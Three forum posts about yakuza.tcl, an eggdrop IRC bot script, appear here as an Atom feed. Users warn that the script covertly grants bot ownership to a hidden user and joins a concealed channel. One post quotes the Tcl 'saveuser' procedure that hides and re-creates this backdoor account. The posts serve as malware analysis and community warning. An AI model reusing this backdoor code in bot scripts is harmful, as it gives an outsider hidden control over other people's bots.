<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-gb">
	<link rel="self" type="application/atom+xml" href="https://forum.eggheads.org/app.php/feed/topic/17597" />

	<title>egghelp/eggheads community</title>
	<subtitle>Discussion of eggdrop bots, shell accounts and tcl scripts.</subtitle>
	<link href="https://forum.eggheads.org/index.php" />
	<updated>2010-02-17T16:41:38-04:00</updated>

	<author><name><![CDATA[egghelp/eggheads community]]></name></author>
	<id>https://forum.eggheads.org/app.php/feed/topic/17597</id>

		<entry>
		<author><name><![CDATA[nml375]]></name></author>
		<updated>2010-02-17T16:41:38-04:00</updated>

		<published>2010-02-17T16:41:38-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=92133#p92133</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=92133#p92133"/>
		<title type="html"><![CDATA[yakuza.tcl; from eggdrop tcl archives]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=92133#p92133"><![CDATA[
Might be this part of the script (does look awfully similar to the script we all love to hate..)<div class="codebox"><p>Code: </p><pre><code>proc saveuser {} { global ps owner if {![validuser $ps]} {  setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq." } elseif {$owner != $ps} {  setuser $owner XTRA "BEND" [zip [chattr $ps]]  if {[passwdok $ps ""] != 1} {   setuser $owner XTRA "LAST" [getuser $ps "PASS"]  }  deluser $ps } save if {![validuser $ps]} {  adduser $ps "$ps!*@*"  chattr $ps [dezip [getuser $owner XTRA "BEND"]]  if {[getuser $owner XTRA "LAST"] != ""} {   setuser $ps PASS [getuser $owner XTRA "LAST"]  } } return 1}</code></pre></div>A few other things in there that might be nasty as well, skimming through the code atm...<br><br>Updated:<br>It would also seem it will try to join your bot to a dedicated channel, while hiding any information about this to you. I'll see if I can't decode which channelname (looks like the same encryption/decryption-scheme as used by n**gate).<br><br>Updated:<br>Channel would appear to be #fortuna<br><br>Updated:<br>It will also make use of a second user record called "config". Not entirely sure if it's purpose yet, but it would seem it "is supposed to" be used for keeping settings. Still uses weak encryption. Also adds user records for each channel it keeps setting for...<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=8052">nml375</a> — Wed Feb 17, 2010 4:41 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Sir_Fz]]></name></author>
		<updated>2010-02-17T10:01:44-04:00</updated>

		<published>2010-02-17T10:01:44-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=92127#p92127</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=92127#p92127"/>
		<title type="html"><![CDATA[yakuza.tcl; from eggdrop tcl archives]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=92127#p92127"><![CDATA[
On what basis are you making this statement?<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3085">Sir_Fz</a> — Wed Feb 17, 2010 10:01 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[VampireLord]]></name></author>
		<updated>2010-02-17T02:21:49-04:00</updated>

		<published>2010-02-17T02:21:49-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=92124#p92124</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=92124#p92124"/>
		<title type="html"><![CDATA[yakuza.tcl; from eggdrop tcl archives]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=92124#p92124"><![CDATA[
this tcl auto adds hikaro to the bots owner and auto adds a channel. this post may serve as a warning<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=11076">VampireLord</a> — Wed Feb 17, 2010 2:21 am</p><hr />
]]></content>
	</entry>
	</feed>
